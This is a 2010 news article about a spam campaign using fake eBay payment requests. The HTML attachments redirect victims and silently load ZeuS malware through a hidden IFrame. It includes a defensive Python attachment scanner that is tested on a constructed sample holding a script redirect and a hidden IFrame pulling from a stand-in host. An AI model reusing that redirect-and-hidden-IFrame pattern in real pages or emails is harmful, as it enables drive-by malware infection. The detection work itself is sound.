Attached HTML files redirect to malicious websites

Jul 13, 2010 19:45 GMT  ·  By
Spammers use eBay payment request lure to trick users into opening attachment

A new email spam campaign spreads emails masquerading as payment requests coming from eBay. Users are lured into opening an attached HTML file which redirects them to a malware pushing website.

The rogue email messages have the subject line “Payment request from.” This is most likely a spelling mistake; the spammers probably intended to write “payment request form,” as suggested by the attached HTML file being named form.html. The message body is empty, but the “From” field is forged to make the emails appear to come from a [email protected] address.

“Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about. And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q,” Graham Cluley, senior technology consultant at Sophos, writes.

There are in fact two parts to this attack. First, a redirect takes users to a common Canadian Pharmacy spam site, tricking them into believing that nothing truly dangerous has happened. In the background, however, a rogue IFrame loads a malicious script from a third-party website. This code silently downloads and executes a piece of malware on the visitors' computers.
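The two-stage chain described above (a visible redirect plus a hidden IFrame pulling in a remote script) leaves recognisable traces in the HTML attachment itself, which is where mail-gateway filtering can catch it before anything reaches a browser. The following scanner is an added example written for this article, not code from Sophos or from the campaign; it walks an HTML attachment with Python's standard `html.parser` and flags inline-script redirects, meta-refresh redirects, zero-size or display:none IFrames, and script or IFrame sources that point at external hosts. The sample attachment is constructed here to mimic the pattern in the article and is not the real form.html.

```python
"""Heuristic scanner for HTML e-mail attachments (added example, not the article's code)."""
from html.parser import HTMLParser
import re

# Constructed stand-in for the kind of attachment the article describes; not the real form.html.
SAMPLE_ATTACHMENT = """<html><body>
<script type="text/javascript">
  window.location = "http://pharmacy-landing.example/";
</script>
<iframe src="http://loader.example/x.html" width="0" height="0" style="display:none"></iframe>
</body></html>"""

# Constructed benign attachment used as a control.
CLEAN_ATTACHMENT = "<html><body><p>Your order confirmation</p></body></html>"

# Assignments to location / location.href, or location.replace(...), inside inline script.
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=(?!=)"
    r"|location\.replace\s*\(",
    re.IGNORECASE,
)


def _is_external(url):
    """True when a src attribute points at another host rather than inline content."""
    return bool(url) and url.strip().lower().startswith(("http://", "https://", "//"))


def _is_hidden(attrs):
    """True for the zero-size or CSS-hidden frames typically used to load a dropper silently."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (
        attrs.get("width", "").strip() in ("0", "0px")
        or attrs.get("height", "").strip() in ("0", "0px")
        or "display:none" in style
        or "visibility:hidden" in style
    )


class AttachmentScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if _is_external(a.get("src")):
                self.findings.append(("external-script", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "iframe":
            if _is_hidden(a):
                self.findings.append(("hidden-iframe", a.get("src", "")))
            if _is_external(a.get("src")):
                self.findings.append(("external-iframe", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for a navigation assignment.
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append(("script-redirect", data.strip()[:80]))


def scan_attachment(html):
    """Return the list of (kind, detail) findings for one HTML attachment."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(html):
    """Gateway-style verdict: any finding is enough to quarantine the message for review."""
    return bool(scan_attachment(html))


if __name__ == "__main__":
    for kind, detail in scan_attachment(SAMPLE_ATTACHMENT):
        print(f"{kind}: {detail}")
    print("clean sample suspicious?", is_suspicious(CLEAN_ATTACHMENT))
```

Run against the constructed sample this reports a script redirect, a hidden IFrame and an external IFrame source, while the benign control produces no findings. The heuristics are deliberately coarse: a legitimate HTML attachment rarely needs to navigate the browser elsewhere or embed an invisible frame, so any hit is a reasonable trigger for quarantine and analyst review rather than for an automatic block.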

Such attacks are known as drive-by downloads, and this particular one is used to push a Zbot variant. Zbot, or ZeuS, is a computer trojan commonly used to steal online banking credentials and other financial information. It is the weapon of choice for fraudsters looking to siphon money out of the bank accounts of individuals, companies and organizations everywhere.

The practice of attaching malicious HTML files to emails has intensified lately. Just yesterday we reported on a very similar spam campaign that masqueraded as YouTube friend requests.

You can follow the editor on Twitter @lconstantin